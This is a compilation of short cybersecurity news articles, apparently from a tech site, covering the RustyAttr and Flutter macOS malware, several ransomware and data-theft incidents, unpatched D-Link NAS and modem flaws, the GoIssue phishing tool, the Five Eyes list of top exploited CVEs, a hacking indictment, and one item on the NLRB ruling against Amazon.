• Security researchers from Group-IB discover unique new piece of malware
• It abuses extended attributes for macOS files to deploy the payload
• The malware is most likely built by North Korean state-sponsored actors

Cybersecurity researchers have stumbled upon yet another malware variant for macOS likely built by the notorious North Korean Lazarus group.

The report from Group-IB concerns the discovery of RustyAttr, a brand new piece of macOS malware built using the Tauri framework. T

he malware was not flagged on VirusTotal and was, at one point, signed using a legitimate Apple developer ID. The ID has since been revoked.

Extended attributes

Days before them, researchers from Jamf found something similar - a seemingly benign app on VirusTotal, built with Flutter, and serving as a backdoor for macOS victims.

In both cases, the malware used novel obfuscation methods, but wasn’t fully operational, leading the researchers to believe that they were mere experiments, as crooks look for new ways to hide the infection.

RustyAttr was found abusing extended attributes for macOS, the researchers claim.

Extended attributes (xattrs) are a feature that allows files and directories to store additional metadata beyond standard attributes like name, size, and permissions. They are used for different things, from storing security-related information, to tagging files with specific metadata, and enabling compatibility with other file systems. In this case, the EA name was “test”, and carries a shell script.

When the malware runs, it loads a website with a piece of JavaScript. This JavaScript - called preload.js, pulls content from “test” which seems to be a location. This location is then sent to the ‘run_command’ function, where the shell script executes it.

While the process is ongoing, the victim is tricked with a decoy PDF file or a fake error message that pops up in the foreground.

RustyAttr was most likely built by Lazarus, the researchers said, although since there are no reported victims, they cannot be absolutely certain. However, they are confident that the malware was built to test new delivery and obfuscation methods on macOS devices.

Via BleepingComputer

You might also like

• D-Link routers are being hacked to steal customer passwords — but it says there is no patch
• Here's a list of the best firewalls around today
• These are the best endpoint protection tools right now

• American Associated Pharmacies allegedly fell prey to a ransomware attack
• The attackers are saying the company paid for the decryptor
• The group is asking for more money, to keep the stolen files private

American Associated Pharmacies (AAP) is joining the ever-growing list of American healthcare organizations to have suffered a ransomware attack.

Following the likes of Change Healthcare, Henry Schein, CommonSpirit, and many others, AAP appaears to have suffered the classic double whammy - having its sensitive data stolen, and its systems encrypted.

A report from The Register claims the company is yet to make an official statement regarding the attack, having only force-reset passwords for all of its users, and notify them of the change.

Say hi to Embargo

"All user passwords associated with both APIRx.com and RxAAP.com have been reset, so existing credentials will no longer be valid to access the sites," the company said in a short announcement. "Please click 'forgot password' on the log in screen and follow the prompts accordingly to reset your password."

At the same time, the group that assumed responsibility for the attack is called Embargo. You can be excused for not hearing about them, as they’re a relatively new group. ESET seems to be the first to spot the new actor, when it used endpoint detection and response (EDR) killing tools to drop its payload, last June. It also observed the group using a Rust-based ransomware kit.

New or not, Embargo claims to have stolen almost 1.5TB of sensitive data. It also claims that AAP paid $1.3 million to have its systems restored, and that it needs to pay an additional $1.3 million to keep the stolen files off the dark web.

We don’t know what kinds of documents Embargo stole from the company, but if the Change Healthcare attack was any indication, they could be highly classified information whose leak could lead to class-action lawsuits and regulatory pressure.

We have reached out to AAP with additional questions and will report if we hear anything back.

You might also like

• United Health confirms largest ever US healthcare data breach, says 100 million users had info stolen
• Here's a list of the best firewalls today
• These are the best endpoint protection tools right now

• Iranian state-sponsored actors are targeting aerospace pros with fake jobs
• The goal is to install backdoors and exfiltrate important data
• The style mimics that of Lazarus, a known North Korean actor

Iranian state-sponsored hackers have been observed targeting victims in the aerospace industry with fake job offers, which resulted in the deployment of the SnailResin malware, as part of their cyber-espionage campaign.

Cybersecurity researchers at ClearSky revealed how the threat actor, known as TA455, created fake recruitment sites, and fake profiles on social media sites such as LinkedIn. After that, they would approach their targets, and get them to download files as part of the onboarding process.

Among the files was SnailResin, a piece of malware that acts as a loader for the SlugResin backdoor, capable of data exfiltration, command-and-control (C2) communication, and persistence on victim systems.

Iranians? Or North Koreans? Or both?

The campaign, dubbed “Dream Job” started in September 2023, if not earlier, ClearSky noted.

TA455 is a well-known cyberespionage group, linked with Iran's Islamic Revolutionary Guard Corps (IRGC), and shares similarities with other groups like APT35 and TA453. Besides the aerospace industry, TA455 was seen targeting defense, and government entities, in the Middle East, Europe, and the US. Its goal, for the most part, is cyber-espionage, gathering sensitive information for geopolitical intelligence purposes.

What makes this campaign particularly interesting is the fact that it mimics the style of Lazarus, a North Korean state-sponsored group. Fake job attacks are basically synonymous with Lazarus at this point, as they were used in some of the most destructive campaigns against firms in the crypto industry. At this point, ClearSky doesn’t know if TA455 is mimicking Lazarus, tries to hide behind the group, or is in cooperation with them.

“The similar “Dream Job” lure, attack techniques, and malware files suggest that either Charming Kitten was impersonating Lazarus to hide its activities, or that North Korea shared attack methods and tools with Iran,” they said.

In any case, be careful when getting new job offers, especially if they sound too good to be true.

You might also like

• North Korean Lazarus hackers are using a fake coding test to steal passwords
• Here's a list of the best firewalls today
• These are the best endpoint protection tools right now

• Earlier this week, researchers discover a 9.2 flaw affecting multiple NAS models
• D-Link says it won't patch them since they reached end-of-life status
• Crooks are now targeting them with available exploit code

Cybercriminals have begun targeting D-Link NAS devices, recently found to have a critical vulnerability, but which will not be patched due to being at their end of life.

Threat monitoring service Shadowserver recently sounded the alarm in a brief thread posted on X.

It was recently reported multiple versions of D-Link NAS devices were vulnerable to a 9.2-severity flaw that could allow hackers to interfere with the endpoints. However, as the devices had reached their end-of-life, the company said it would not be addressing the flaw, and would not be issuing a patch - instead, advising users to replace the devices with newer models.

Thousand(s) of victims

While the researchers said the exploitation was somewhat difficult since the complexity of an attack was relatively high, they did stress that there is a publicly available exploit out there.

“We have observed D-Link NAS CVE-2024-10914 /cgi-bin/account_mgr.cgi command injection exploitation attempts starting Nov 12th,” the researchers said. “This vuln affects EOL/EOS devices, which should be removed from the Internet.”

They added that in total, there were more than 60,000 endpoints out there that could be compromised, including different models such as DNS-320 Version 1.00,

DNS-320LW Version 1.01.0914.2012, DNS-325 Version 1.01, Version 1.02, and DNS-340L Version 1.08.

Shadowserver also said that it observed roughly 1,100 potential victims, significantly fewer than the 60,000 that were originally claimed.

A NAS device is a dedicated data storage unit connected to a network, allowing multiple users and devices to access and store data centrally. It provides secure file sharing, data backup, and storage, making it ideal for both home and business use. NAS devices are typically easy to set up and scale, offering RAID support and other protections against data loss.

Cybercriminals frequently target NAS devices because they often hold sensitive data, including personal documents, financial information, and business files. By compromising NAS systems, attackers can steal, encrypt, or delete valuable data, with ransomware being a common threat.

Via BleepingComputer

You might also like

• Thousands of D-Link NAS devices have serious backdoor security issues
• Here's a list of the best firewalls today
• These are the best endpoint protection tools right now

• The National Labor Relations Board has ruled against Amazon
• Amazon can no longer hold mandatory anti-union meetings
• The meetings were found to violate worker's rights

The National Labor Relations Board (NLRB) has ruled Amazon can no longer impose mandatory ‘captive audience’ meetings on staff, as it were found to be using these events to ‘coerce’ employees with anti-unionization objectives.

The decision passed 3-1, with the NLRB General Counsel, Jennifer Abruzzo, arguing the meetings violated worker’s rights, as they were forced to attend and be subjected to the company’s anti-union messaging.

Abruzzo affirmed companies should be free to make their case against unions, but workers shouldn’t be forced to listen.

Wins for workers

This is the latest development in a string of conflicts between Amazon and its workers, with the retailer aggressively opposing organizing efforts and unionization in its warehouses.

Tech workers have some of the lowest union membership rates of any industry, and efforts by Amazon to dissuade workers from organizing have proved effective. However, the law states that workers must be able to freely choose whether to debate union representation, and when and how they do it.

“Ensuring that workers can make a truly free choice about whether they want union representation is one of the fundamental goals of the National Labor Relations Act. Captive audience meetings—which give employers near-unfettered freedom to force their message about unionization on workers under threat of discipline or discharge—undermine this important goal,” said Chairman Lauren McFerran.

“Today’s decision better protects workers’ freedom to make their own choices in exercising their rights under the Act, while ensuring that employers can convey their views about unionization in a noncoercive manner."

Despite the considerable opposition from the retail giant, workers in Staten Island won a historic victory by voting to create the Amazon Labor Union, a huge step in their struggle for better working conditions and protections.

Via Engadget

You might also like

• Take a look at our pick of the best AI tools
• UK retailers launch £1bn claim against Amazon for data misuse
• Check out our choices for best project management software

• Hacker found selling a database of 180+million emails on the dark web
• The archive was stolen from a data broker
• The data broker confirmed the information was scraped from public sources

A hacker is selling a database containing 183 million records of people’s contact details, including email addresses, stolen from a data broker who, in turn, generated it by scraping publicly available data.

One might say, no harm - no foul, but still, whoever buys this database will get the chance to annoy millions of people with spam, and possibly even target them with phishing, malware, and business email compromise (BEC).

The database, which includes people’s business email addresses, postal addresses, phone numbers, employer names, job titles, and links to various social media, is being sold by a threat actor alias ‘KryptonZambie’, for $6,000.

Decommissioned legacy systems

The archive was stolen from a data broker company called DemandScience (previously known as Pure Incubation) who has confirmed the data was publicly available to start with.

"It is also important to note that we process publicly available business contact information, and do not collect, store, or process consumer data or any type of credential information or sensitive personal information including accounts, passwords, home addresses or other personal, non-business information," a DemandScience spokesperson said in an email.

HaveIBeenPwned?, a website that tracks email addresses compromised in various data breaches, reports that the archive was pulled from a “decommissioned legacy system: “In early 2024, a large corpus of data from DemandScience (a company owned by Pure Incubation), appeared for sale on a popular hacking forum. Later attributed to a leak from a decommissioned legacy system, the breach contained extensive data that was largely business contact information aggregated from public sources.”

We don’t know if the hacker managed to sell the database already, or if there were multiple buyers. At press time, there was no information of in-the-wild abuse.

Via The Register

You might also like

• FBI warns hackers are filing fake police data requests to steal people’s private information
• Here's a list of the best firewalls today
• These are the best endpoint protection tools right now

• Five Eyes alliance has revealed the most exploited vulnerabilities of 2023
• Zero-day exploits were the primary concern, with CVE-2023-3519 was at the top of the list
• Businesses urged to patch as soon as possible to stay safe

The Five Eyes intelligence alliance has revealed the most routinely exploited vulnerabilities for 2023. The joint advisory, made with contributions from agencies in the US, UK, Australia, New Zealand, and Canada, has called for organizations to patch the security flaws to mitigate network exposure.

The agencies confirmed what many in the industry will know all too well, that threat actors focus their attacks on zero-day attacks, with 12 out of the top 15 exploited vulnerabilities initially exploited as a zero-day.

“In 2023, malicious cyber actors exploited more zero-day vulnerabilities to compromise enterprise networks compared to 2022, allowing them to conduct cyber operations against higher-priority targets,” the advisory warned.

Injections and escalations

The top vulnerability for 2023 was CVE-2023-3519, a code injection in NetScaler ADC/Gateway using Citrix as the vendor, which was the tactic used in critical infrastructure attacks in the US last year, and had a severity rating of 9.8, making it a critical flaw.

Another high severity flaw in the top three, CVE-2023-20198, was one that Cisco issued a patch for in October 2023, which allowed attackers to create accounts on affected devices with privileged access, gaining full control over the device.

The agencies, as always, strongly encouraged end-user organizations to continually update software and applications, implement a robust patch management process, and perform regular secure systems backups to ensure your company stays safe against cyberattacks.

“Malicious cyber actors continue to have the most success exploiting vulnerabilities within two years after public disclosure of the vulnerability," the advisory warned,

“The utility of these vulnerabilities declines over time as more systems are patched or replaced. Malicious cyber actors find less utility from zero-day exploits when international cybersecurity efforts reduce the lifespan of zero-day vulnerabilities.”

You might also like

• Take a look at our pick of the best antivirus removal software
• Five Eyes alliance seizes control of extensive spy tech network used by China
• Check out our choices for best ransomware protection tools around

• Researchers discover Golssue - a new tool for extracting GitHub user emails
• It is being sold for $700 on the dark web
• Such a high-precision tool could lead to dangerous supply chain attacks

GitHub users are allegedly being targeted in a brand new phishing campaign, according to SlashNext.

The company recently published an article titled “GoIssue – The Tool Behind Recent GitHub Phishing Attacks”, detailing the tool, which, from the headline, appears to have already been put to use.

However, the article’s body mostly discusses the potential risks and the ways it could be used to facilitate targeted phishing campaigns and other cyber attacks. It outlines the features of GoIssue and how attackers "could" use it to target GitHub users, suggesting hypothetical scenarios rather than confirming any specific incidents where the tool has been deployed.

Discount for early adopters

In any case, Golssue is definitely a sophisticated hacking tool, and GitHub users should be on their guard.

SlashNext claims Golssue can extract email addresses from public GitHub profiles, and send bulk emails directly to people’s inboxes. That way, crooks could craft highly targeted, convincing phishing emails, which could result in GitHub users losing access to their profiles, or having projects compromised with malware in supply-chain attacks.

"Whether you're aiming to reach a specific audience or expand your outreach, GoIssue offers the precision and power you need," Golssue’s developer, a threat actor called ‘cyberdluffy’ said in an ad posted on the dark web.

To purchase a custom build of the tool, you will need to pay $700. Access to the source code can also be acquired, but for $3,000. TheHackerNews found on October 11, the developer slashed the prices to $150 and $1,000 respectively - for the first five customers. So, we might assume that no groups used it just yet.

GitHub is a web-based platform that provides version control and collaboration features for software development projects. It is extremely popular, and as such, often targeted by various criminal groups.

Via SlashNext

You might also like

• D-Link routers are being hacked to steal customer passwords — but it says there is no patch
• Here's a list of the best firewalls today
• These are the best endpoint protection tools right now

• Ahold Delhaize confirms being hit by cyberattack
• Multiple retail stores across the US were affected by the attack
• Other details are not known at this time

Multinational retailer Ahold Delhaize has confirmed recently suffering a cyberattack which forced it to shut down parts of its IT infrastructure. As a result, some of its grocery stores and pharmacies, mainly those in the United States, could not service their customers properly.

In a press release, the company said it recently detected a cybersecurity issue within its US network, brought in third-party experts to assist, notified the police, and brought its network offline.

The company operates a variety of supermarket, convenience store, and online grocery brands across Europe and the United States, including brands like Food Lion, Stop & Shop, and Giant.

Delivery delays and other problems

“This issue and subsequent mitigating actions have affected certain Ahold Delhaize USA brands and services including a number of pharmacies and certain e-commerce operations,” the company said in its announcement.

“Each of Ahold Delhaize USA’s brands' stores are open and serving customers. We will continue to take actions to further protect our systems. The security of our customers, associates and partners is a top priority.”

A report from The Register claims woes for US retailers have been going on for a week now, resulting in even the staff voicing their annoyance on social media.

Not all retailers were affected the same way, however - as at one point, the pharmacy at Stop & Shop could not refill prescriptions. The problem was only exacerbated with phone lines being down, as well. The Food Lion, on the other hand, had to address missing and delayed deliveries. Instacart orders return dates were constantly being pushed back.

At the moment, further details are scarce, and The Register claims that employees were told not to discuss the incident with the media.

Usually, when a company shuts down its systems, it’s to prevent them from being encrypted, and to prevent hackers from exfiltrating information - which usually happens in a ransomware attack.

You might also like

• Cybercriminals are leveraging big retail names in attacks this holiday season
• Here's a list of the best firewalls today
• These are the best endpoint protection tools right now

• Experts found six malicious apps built for macOS
• The Apple IDs used to sign the apps have been revoked
• The malware was likely just an experiment

North Korean state-sponsored threat actors have been seen targeting macOS users with fake games and crypto tracking apps built with Flutter.

Cybersecurity researchers at Jamf recently found several apps on VirusTotal which seemed completely benign, yet connected to servers in North Korea, which was deemed “stage one” malware functionality.

There are two particularly interesting details about this malware. First - it was created with Flutter, an open source user interface (UI) software development kit created by Google. It allows developers to build natively compiled applications for mobile (iOS and Android), web, and desktop (Windows, macOS, Linux) from a single codebase.

Six malicious apps

One of the apps was called 'New Updates in Crypto Exchange (2024-08-28).app', and others were labeled in a similar manner. Yet, when opened, they ran open-source minesweeper games and similar.

Flutter, which uses the Dart programming language, provides obfuscation to the malicious code by design, the researchers said. Therefore, the malware was not that easy to spot (hence appearing as benign in VirusTotal).

The second interesting detail is that the apps were signed and notarized by a legitimate Apple developer ID, which means that at some point, they passed Apple’s security checks.

Jamf found a total of six apps, five of which were signed by a working Apple developer ID. It has been revoked in the meantime.

Yet, the researchers believe that the apps were never meant to be a part of an actual hacking campaign, and that they only served as an experiment.

“The malware discovered in this blog shows strong signs that it is likely testing for greater weaponization,” they added. “This could perhaps be an attempt to see if a properly signed app with malicious code obscured within a dylib could get approved by Apple’s notarization server, as well as slide under the radar of antivirus vendors.”

Via BleepingComputer

You might also like

• D-Link routers are being hacked to steal customer passwords — but it says there is no patch
• Here's a list of the best firewalls today
• These are the best endpoint protection tools right now

• Security researchers find critical flaws in modems reaching End of Life
• D-Link says it won't patch them, and recommends upgrading the hardware
• There are some 60,000 vulnerable devices out there

Older D-Link routers are potentially vulnerable to more than one critical security issue which could allow threat actors to take over the devices. However, since they have reached end-of-life status (EoL), the company says it will not be releasing any patches, and advises users to replace the endpoints with newer models.

The news comes shortly after we reported multiple D-Link NAS endpoints were found vulnerable to CVE-2024-10914, a command injection flaw with a 9.2 severity score - however the company again said it wouldn’t be issuing a fix, since the affected devices have all reached EoL.

Now, security researcher Chaio-Lin Yu (Steven Meow) found three bugs plaguing the D-Link DSL6740C modem. One is tracked as CVE-2024-11068, has a severity score of 9.8, and allows threat actors to change passwords through privileged API access. The other two are CVE-2024-11067, and CVE-2024-11066, and are a path traversal flaw and a remote code execution (RCE) flaw, with 7.5 and 7.2 scores, respectively.

Tens of thousands of vulnerable endpoints

Roughly 60,000 vulnerable devices are currently connected to the internet, the majority being located in Taiwan. The model isn’t even available in the US, BleepingComputer states, since it reached EoL almost a year ago. With that in mind, D-Link said it wouldn’t be addressing the flaw, and suggests "retiring and replacing D-Link devices that have reached EOL/EOS."

The same model is also vulnerable to four additional high-severity command injection flaws, the publication states, citing information from the Taiwanese computer and response center (TWCERTCC). These flaws are tracked as CVE-2024-11062, CVE-2024-11063, CVE-2024-11064, and CVE-2024-11065.

Users who are unable to replace their routers at the moment are advised to at least restrict remote access, and set secure access passwords, to minimize the chance of compromise. This would be a wise move since routers are one of the most targeted endpoints out there.

You might also like

• D-Link routers are being hacked to steal customer passwords — but it says there is no patch
• Here's a list of the best firewalls today
• These are the best endpoint protection tools right now

• Connor Moucka and John Binns accused of attacking 10 companies, including AT&T
• The US Government claims they extorted 36 bitcoin from their victims
• Both were known to law enforcement in the past

The US government has accused two individuals of breaching 10 major companies, stealing their sensitive data, and then either extorting the firms for money, or selling the stolen data on the dark web. Among the victims is, most likely, AT&T, the American telecommunications powerhouse.

In the indictment, which TechCrunch published, the two individuals are named as Connor Moucka and John Binns. Both are already known, to both the media and law enforcement, as Alexander ‘Connor’ Moucka (aka Waifu and Judische) was taken into custody on October 30, in Canada, following a request by US law enforcement.

Binns, on the other hand, was already mentioned in relation to the AT&T hack, as one of the hackers with access to the stolen database, who tried to sell it back to the company. He was arrested in Turkey, for alleged crimes he committed in 2021 and, apparently, was to blame for the data breach that happened at T-Mobile, as well.

Hints of AT&T

The US government claim Moucka and Binns “devised and executed international computer hacking and wire fraud schemes to hack into at least 10 victim organizations’ protected computer networks, steal sensitive information, threaten to leak the stolen data unless the victims paid ransoms, and offer to sell online, and sell, the stolen data.”

“Through this scheme, the co-conspirators gained unlawful access to billions of sensitive customer records, including individuals’ non-content call and text history records, banking and other financial information, payroll records, Drug Enforcement Agency (DEA) registration numbers, driver’s license numbers, passport numbers, Social Security Numbers, and other personally identifiable information,” it says in the indictment.

The result of the attacks, the Government concludes, is profit of “at least 36 bitcoin ($2.5m at time of payment)” extorted from at least three victims.

While the document does not mention the names of victim companies, it does list Victim-2 as a major telecommunications company located in the United States, whose Cloud Computing Instance was hosted at computer servers located in Virginia. It was also said that this victim was breached in mid-April. All these things align it with AT&T.

Both the company, and the Department of Justice (DoJ), are currently silent on the matter.

Via TechCrunch

You might also like

• Snowflake hacker arrested over data breach and extortion
• Here's a list of the best firewalls today
• These are the best endpoint protection tools right now